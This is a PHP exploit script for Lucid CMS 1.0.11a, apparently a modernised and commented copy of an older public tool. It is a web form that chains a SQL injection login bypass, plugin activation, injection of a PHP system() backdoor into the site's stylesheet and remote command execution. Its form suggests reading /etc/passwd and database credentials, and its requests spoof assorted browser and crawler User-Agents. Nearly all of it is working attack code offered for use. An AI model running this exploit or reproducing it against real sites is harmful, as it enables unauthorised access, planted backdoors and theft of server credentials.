<?php
# 7.36 30/09/2005 #
# #
# ---lucid_cms_1011expl.php #
# #
# Lucid CMS 1.0.11a SQL Injection / login bypass / remote code execution #
# all-in-one #
# #
# This exploits the vulnerability described here: #
# http://rgod.altervista.org/lucid1011.html #
# #
# by rgod #
# site: http://rgod.altervista.org #
# #
# make these changes in php.ini if you have troubles #
# to launch this script (note: both directives were removed in PHP 5.4, #
# so on newer PHP the form fields have to be read from $_POST instead): #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# usage: customize for your own pleasure, launch this script from Apache, #
# fill requested fields, then go! #
# #
# Sun-Tzu: "O divine art of subtlety and secrecy! Through you we learn to be #
# invisible, through you inaudible" #
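error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
// The form posts back to this same script. The original referenced the
// undefined $SERVER[PHP_SELF] (so the action was empty); PHP_SELF is
// attacker-influenced through the request path, so it is HTML-escaped before
// being placed in the attribute (classic reflected XSS in the tool's own page).
$self = isset($_SERVER['PHP_SELF']) ? htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES) : '';
// Same markup as before, with the "Stil\ne6" class name and the
// 'type="submit"name=' attribute run re-joined so the page renders as intended.
echo <<<HTML
<head><title> Lucid CMS 1.0.11a remote commands execution </title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
body,td,th {color: #00FF00;}
body {background-color: #000000;}
.Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }
.Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold; font-style: italic; }
-->
</style></head>
<body>
<p class="Stile6"> Lucid CMS V 1.0.11a (possibly prior versions) remote commands execution</p>
<p class="Stile6">a script by rgod at <a href="http://rgod.altervista.org" target="_blank">http://rgod.altervista.org</a></p>
<table width="84%"><tr><td width="43%">
<form name="form1" method="post" action="{$self}?path=value&host=value&port=value&command=value&proxy=value">
<p><input type="text" name="host"> <span class="Stile5">hostname (ex: www.sitename.com) </span></p>
<p><input type="text" name="path"><span class="Stile5"> path ( ex: /lucidcms/ or just /) </span></p>
<p><input type="text" name="port"> <span class="Stile5"> specify a port other than 80 (default value) </span></p>
<p><input type="text" name="command"> <span class="Stile5"> a Unix command , example: ls -la to list directories, cat /etc/passwd to show passwd file, cat dbConfig.php to show database username &amp; password </span></p>
<p><input type="text" name="proxy"> <span class="Stile5"> send exploit through an HTTP proxy (ip:port)</span></p>
<p><input type="submit" name="Submit" value="go!"></p>
</form></td></tr></table>
</body>
</html>
HTML;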
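// Hex-dump $headeri into an HTML table: per row of 16 bytes, the two-digit hex
// codes, a spacer cell, then the same bytes as text. A short final row is padded
// so the text columns stay aligned.
// Fixes vs. the original: the last row no longer reads one byte past the end
// of the string, a length that is an exact multiple of 16 no longer gets an
// extra padded row, and every byte written to the text column is HTML-escaped
// (control/non-ASCII bytes shown as '.'). The dumped packets embed the
// user-supplied host, path and command, which were previously written into
// the page unescaped.
function show($headeri)
{
    $headeri = (string)$headeri;
    $len = strlen($headeri);
    echo '<table border="0">';
    for ($off = 0; $off < $len; $off += 16) {
        $row = substr($headeri, $off, 16);
        $rowlen = strlen($row);
        echo '<tr>';
        for ($i = 0; $i < $rowlen; $i++) {
            echo '<td>' . sprintf('%02x', ord($row[$i])) . '</td>';
        }
        // pad a short final row so the character cells line up with the rows above
        for ($i = $rowlen; $i < 16; $i++) {
            echo '<td>&nbsp;</td>';
        }
        echo '<td>&nbsp;</td>';
        for ($i = 0; $i < $rowlen; $i++) {
            $code = ord($row[$i]);
            // keep the table well-formed: escape markup, hide non-printable bytes
            $ch = ($code < 0x20 || $code > 0x7e) ? '.' : htmlspecialchars($row[$i], ENT_QUOTES);
            echo '<td>' . $ch . '</td>';
        }
        echo '</tr>';
    }
    echo '</table>';
}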
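// Accepts "a.b.c.d:port" only. Anchored so trailing text ("1.2.3.4:80 junk")
// is rejected instead of reaching explode(':') in the send functions; octets
// are not range-checked. Written with bracket-style delimiters so it is a valid
// preg_match() pattern -- the original was passed to eregi(), removed in PHP 7.
$proxy_regex = '(^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}$)';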
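// Sends the global $packet to $host:$port (or to the $proxy "ip:port") through
// the sockets extension and stores the raw reply in the global $html. Keeps the
// original no-argument signature: callers pass $packet positionally, but the
// function reads it, and everything else, from globals.
// Fixes vs. the original: $proxy_regex is now imported (the check ran against
// an undefined pattern, rejecting every proxy); socket_create()/socket_connect()
// failures are detected (they return false, never a negative number, so the
// "< 0" tests never fired and a failed connect was treated as success); the
// socket is closed on every exit path; a receive timeout bounds the read loop
// (ext/sockets ignores default_socket_timeout, so a Keep-Alive server could
// block socket_read() until it dropped the connection).
function sendpacket()
{
    global $proxy, $host, $port, $packet, $html, $proxy_regex;
    $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    if ($socket === false) {
        echo "socket_create() failed: reason: " . socket_strerror(socket_last_error()) . "<br>";
        return;
    }
    socket_set_option($socket, SOL_SOCKET, SO_RCVTIMEO, array('sec' => 2, 'usec' => 0));
    echo "OK.<br>";
    echo "Attempting to connect to ".$host." on port ".$port."...<br>";
    if ($proxy == '') {
        $result = socket_connect($socket, $host, (int)$port);
    } else {
        $proxy = trim($proxy);
        if (!preg_match($proxy_regex, $proxy)) {
            echo htmlentities($proxy).' -> not a valid proxy...';
            socket_close($socket);
            die;
        }
        $parts = explode(':', $proxy);
        echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
        $result = socket_connect($socket, $parts[0], (int)$parts[1]);
    }
    if ($result === false) {
        $err = socket_last_error($socket);
        echo "socket_connect() failed.\r\nReason: (".$err.") " . socket_strerror($err) . "<br><br>";
        socket_close($socket);
        return;
    }
    echo "OK.<br><br>";
    $html = '';
    socket_write($socket, $packet, strlen($packet));
    echo "Reading response:<br>";
    // stops on peer close (''), error or receive timeout (false)
    while (($out = socket_read($socket, 2048)) !== false && $out !== '') {
        $html .= $out;
    }
    echo nl2br(htmlentities($html));
    echo "Closing socket...";
    socket_close($socket);
}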
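// Fallback transport for when the sockets extension is not loaded: same
// contract as sendpacket() but over fsockopen(). Takes the packet as a
// parameter; the reply is stored in the global $html.
// Fixes vs. the original: $proxy_regex is imported (it was undefined inside
// the function, so every proxy was rejected) and checked with preg_match()
// (eregi() no longer exists); the direct-connection fsockopen() result is
// checked before writing to it; the proxy read loop no longer spins forever --
// it looped "while (!feof OR no CRLFCRLF seen)", which never terminates once
// EOF arrives without a header terminator.
function sendpacketii($packet)
{
    global $proxy, $host, $port, $html, $proxy_regex;
    if ($proxy == '') {
        $ock = fsockopen(gethostbyname($host), (int)$port);
        if (!$ock) {
            echo 'No response from '.htmlentities($host).'...';
            die;
        }
    } else {
        $proxy = trim($proxy);
        if (!preg_match($proxy_regex, $proxy)) {
            echo htmlentities($proxy).' -> not a valid proxy...';
            die;
        }
        $parts = explode(':', $proxy);
        echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
        $ock = fsockopen($parts[0], (int)$parts[1]);
        if (!$ock) {
            echo 'No response from proxy...';
            die;
        }
    }
    fputs($ock, $packet);
    // Read until the peer closes or the stream times out (feof() is also true
    // after a socket timeout, so Keep-Alive replies end after
    // default_socket_timeout). One EOF-bounded loop now serves both paths; if
    // the proxy branch was meant to stop early at the end of the headers, that
    // intent is not recoverable from the original code.
    $html = '';
    while (!feof($ock)) {
        $chunk = fread($ock, 2048);
        if ($chunk === false || $chunk === '') {
            break;
        }
        $html .= $chunk;
    }
    fclose($ock);
    echo nl2br(htmlentities($html));
}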
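// The five form fields originally arrived through register_globals (removed in
// PHP 5.4). Read them from the POST body when the globals are not already set,
// so the old configuration keeps working and a modern PHP works too.
foreach (array('host', 'path', 'port', 'command', 'proxy') as $field) {
    if (!isset($$field)) {
        $$field = isset($_POST[$field]) ? $_POST[$field] : '';
    }
}
if (($path<>'') and ($host<>'') and ($command<>''))
{
if ($port=='') {$port=80;}
$port = (int)$port; // a non-numeric port used to reach socket_connect() as a string
// through a proxy the request line must carry the absolute URL
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
# so... you know, I'm verbous...
#STEP 1 -> SQL Injection /Login as admin
// The UNION row stands in for the admin record. Its hash column is
// md5('') = d41d8cd98f00b204e9800998ecf8427e, which is exactly what the empty
// login_password posted below hashes to -- that equality is the login bypass.
// Column order (id, user, user, e-mail, hash, level) is what the payload
// implies, not verified against Lucid's schema. The e-mail value in this copy
// of the script was mangled by the hosting site's address obfuscation; any
// value works for the injected row, so a placeholder is used.
$sql=urlencode("'UNION(SELECT'1','admin','admin','admin@localhost','d41d8cd98f00b204e9800998ecf8427e','1')/*");
$sql.=urlencode("Have you ever read that number of X-factor when Jamie Madroz dies 'cause the mutants HIV?");
$data="login_username=".$sql."&login_password=&pageName=&PromptTime=".time();
// No Accept-Encoding on any request: the replies are parsed as plain text
// (Set-Cookie here, the textarea in step 4), which a gzip body would break.
// Connection: close so the server ends the reply instead of holding the
// socket open under Keep-Alive, which the read loops would wait out.
$packet="POST ".$p."index.php?command=panel HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
$packet.="Referer: http://".$host.':'.$port.$path."index.php?command=panel\r\n";
$packet.="Accept-Language: fr\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050922 Firefox/1.0.7 (Debian package 1.0.7-1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: close\r\n";
$packet.="Cache-Control: no-cache\r\n";
// A fixed PHPSESSID is presented with the login. If the target adopts a
// client-supplied id it may not answer with a Set-Cookie at all, which is why
// the extraction below falls back to this same id instead of bailing out.
$packet.="Cookie: PHPSESSID=836324332f0e37553bfa7036f3985f20\r\n\r\n";
$packet.=$data;
show($packet);
sendpacket($packet);
// Only the name=value pair is sent back; the original appended the Set-Cookie
// "path=/" attribute, which is not a cookie. The original also indexed the
// explode() result without checking that a Set-Cookie was present.
if (preg_match('/Set-Cookie:\s*([^;\r\n]+)/i', $html, $m)) {
$cookie=$m[1];
} else {
echo '<br>no Set-Cookie in the response, reusing the session id that was presented...<br>';
$cookie='PHPSESSID=836324332f0e37553bfa7036f3985f20';
}
echo'<br>cookie: -> '.htmlentities($cookie).'<br><br>';
#STEP 2 -> Install RenderPHP plugin...
$packet="GET ".$p."index.php?command=pluginInstall&filename=renderPHP.php HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
$packet.="Referer: http://".$host.':'.$port.$path."index.php?command=managePlugins\r\n";
$packet.="Accept-Language: pl\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SaveWealth)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: close\r\n";
$packet.="Cookie: ".$cookie."\r\n\r\n";
show($packet);
sendpacket($packet);
#STEP 3 -> Plugin activate...
$packet="GET ".$p."index.php?command=pluginActivate&filename=renderPHP.php HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
$packet.="Referer: http://".$host.':'.$port.$path."index.php?command=pluginInstall&filename=renderPHP.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: close\r\n";
$packet.="Cookie: ".$cookie."\r\n\r\n";
show($packet);
sendpacket($packet);
#STEP 4 -> Get Stylesheet for main page, we don't want to ruin that, just to put a backdoor
$packet="GET ".$p."index.php?command=layout&mode=edit&type=style&id=1 HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
$packet.="Referer: http://".$host.':'.$port.$path."index.php?command=manageStyles\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="User-Agent: Opera/8.5 (X11; Linux i686; U; en)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: close\r\n";
$packet.="Cookie: ".$cookie."\r\n\r\n";
show($packet);
sendpacket($packet);
// Pull the current stylesheet out of the edit form's textarea. The original
// walked the reply one character at a time looking for 'textarea', '>' and
// '</textarea>' and looped forever when any of them was missing (e.g. when
// the login in step 1 did not take). Abort instead: posting an empty body in
// step 5 would wipe the site's stylesheet.
$open=stripos($html,'textarea');
$gt=($open===false)?false:strpos($html,'>',$open);
$close=($gt===false)?false:stripos($html,'</textarea>',$gt+1);
if ($close===false) {
echo '<br>could not find the stylesheet textarea in the response (not logged in?), stopping before the style gets overwritten...<br>';
die;
}
$temp=substr($html,$gt+1,$close-$gt-1);
// anything after the marker is a backdoor left by a previous run; drop it so
// re-running does not stack copies
$temp2=explode("***end***",$temp);
echo '<br>'.nl2br(htmlentities($temp2[0])).'<br><br>';
$sheet=$temp2[0];
#STEP 5 -> Shell Inject
$data="content=".urlencode($sheet);
#******shell********************
//ehi, this is your command line, add some # to clean stylesheet...
$data.="***end***";
// the command lands inside a single-quoted PHP string literal: escape \ and '
// so a quote in the command cannot terminate the literal and break the payload
$cmd=str_replace(array('\\', "'"), array('\\\\', "\\'"), $command);
$data.="%0D%0A%3C%3Fphp+error_reporting%280%29%3B+system%28%27".urlencode($cmd);
$data.="+%3E+README";//through this you redirect, a # to if you want to give a rm to output file...
$data.="%27%29%3B+%3F%3E";
#*******************************
$data.="&id=1&save=Save+Style&comment=";
$packet="POST ".$p."index.php?command=saveStyle HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
$packet.="Referer: http://".$host.':'.$port.$path."index.php?command=layout&mode=edit&type=style&id=1\r\n";
$packet.="Accept-Language: es\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: WebCopier v4.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: close\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Cookie: ".$cookie."\r\n\r\n";
$packet.=$data;
show($packet);
sendpacket($packet);
#STEP 6 -> Execute command
$packet="GET ".$p."index.php HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="User-Agent: Mediapartners-Google/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: close\r\n\r\n";
show($packet);
sendpacket($packet);
#STEP 7 -> Looking for redirected output...
// README is written into the web root by the injected system() call and is
// left there, as is the backdoor in the stylesheet; clean both up afterwards.
$packet="GET ".$p."README HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="User-Agent: GameBoy, powered by Nintendo\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: close\r\n\r\n";
show($packet);
sendpacket($packet);
}
else
{echo '<br>fill requested fields, optionalyy specify a proxy...<br><br>';}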
?>